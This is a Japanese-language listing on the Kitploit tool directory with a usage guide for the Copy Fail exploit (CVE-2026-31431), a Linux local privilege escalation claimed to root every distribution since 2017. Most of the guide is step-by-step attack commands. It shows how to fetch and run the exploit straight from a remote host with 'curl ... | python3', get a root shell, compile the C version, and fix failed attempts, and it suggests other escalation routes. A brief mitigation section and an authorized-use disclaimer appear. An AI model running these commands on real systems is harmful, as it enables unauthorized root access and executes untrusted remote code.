Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Copy-Fail-Exploit-CVE-2026-31431 — ほとんどのLinux LPEはレースウィンドウやカーネル固有のオフセットを必要とします。Copy Failは直線的なロジックの欠陥であり、そのどちらも必要としません。同じ732バイトのPythonスクリプト(または.c elf)が、2017年以降に出荷されたすべてのLinuxディストリビューションをroot化します。 | Kitploit
ツール/GitHubGitHub/painoob/copy-fail-exploit-cve-2026-31431
特権昇格エクスプロイトフレームワーク脆弱性分析エクスプロイトペネトレーションテストバイナリエクスプロイト
GitHubpainoob/copy-fail-exploit-cve-2026-31431

Copy-Fail-Exploit-CVE-2026-31431

ほとんどのLinux LPEはレースウィンドウやカーネル固有のオフセットを必要とします。Copy Failは直線的なロジックの欠陥であり、そのどちらも必要としません。同じ732バイトのPythonスクリプト(または.c elf)が、2017年以降に出荷されたすべてのLinuxディストリビューションをroot化します。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
104223ヶ月前Kitploit レビュー済み

Copy Fail (CVE-2026-31431) – エクスプロイト使用ガイド

⚠️ 免責事項

このコンテンツは教育および許可されたセキュリティテスト目的のみに使用されます。明示的な許可なしにシステム上で実行しないでください。


📌 概要

Copy Fail (CVE-2026-31431) は、AF_ALG を介してカーネル暗号化APIに影響を与えるLinuxローカル権限昇格(LPE)の脆弱性です。

これにより、権限のないユーザーがSUIDバイナリ(例: /usr/bin/su)のページキャッシュデータを上書きし、rootアクセスを取得できます。


🧠 要件

システム要件

  • Linuxカーネル(脆弱性あり – パッチ適用状況に依存)
  • AF_ALG が有効
  • algif_aead モジュールがロードされている

Pythonエクスプロイトの要件

  • Python 3.10以上
  • 以下のサポート:
    • os.splice
    • socket(AF_ALG)

🔍 脆弱性の確認

root@kitploit:~
uname -a
grep -i authencesn /proc/crypto
lsmod | grep alg

期待される指標:

  • authencesn(hmac(sha256),cbc(aes))
  • algif_aead がロードされている

🐍 Pythonエクスプロイトの実行

1. 直接実行

root@kitploit:~
python3 copy_fail_exp.py

2. またはcurl経由(リモートホストの場合)

root@kitploit:~
curl https://copy.fail/exp | python3

3. rootシェルを起動

root@kitploit:~
su
id

期待される結果:

root@kitploit:~
uid=0(root)

⚠️ よくある問題(Python)

❌ エラー: os.splice not found

原因:

  • Pythonバージョンが3.10未満
  • 制限付きビルド

解決策:

  • 新しいPythonバイナリを使用する
  • 静的Pythonインタープリタをアップロードする

⚙️ Cバージョンのコンパイル

1. コンパイル

root@kitploit:~
gcc copy_fail_exp.c -o copy_fail

2. 実行可能にする

root@kitploit:~
chmod +x copy_fail

3. エクスプロイトを実行

root@kitploit:~
./copy_fail
su

⚠️ よくある問題(C)

❌ エクスプロイトは実行されるがrootになれない

考えられる原因:

  • カーネルがパッチ適用済み
  • オフセットが正しくない
  • 環境の不一致

❌ コンパイルエラー

必要なツールをインストール:

root@kitploit:~
apt update && apt install build-essential

🧪 トラブルシューティング

システムがパッチ適用済みか確認

root@kitploit:~
dmesg | grep -i alg

モジュールを確認

root@kitploit:~
lsmod | grep algif_aead

🛡️ 緩和策

脆弱なモジュールを無効化

root@kitploit:~
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead

カーネルパッチを適用

システムを更新:

root@kitploit:~
apt update && apt upgrade

📌 注意事項

  • エクスプロイトはページキャッシュのみを変更します(永続的ではない)
  • ローカルアクセスが必要
  • デフォルトではリモートからは悪用不可

🧠 最終的な洞察

エクスプロイトが失敗した場合、以下を検討してください:

  • カーネルがすでにパッチ適用済み
  • 環境の制限
  • 代替の権限昇格ベクトル(SUID、ケーパビリティ、sudoの設定ミス)

📚 参考情報

  • https://copy.fail/
  • CVE-2026-31431

👨‍💻 作成者メモ

このエクスプロイトは、ラボ、CTF、および許可されたペンテストでのみ責任を持って使用してください。

ツールをダウンロード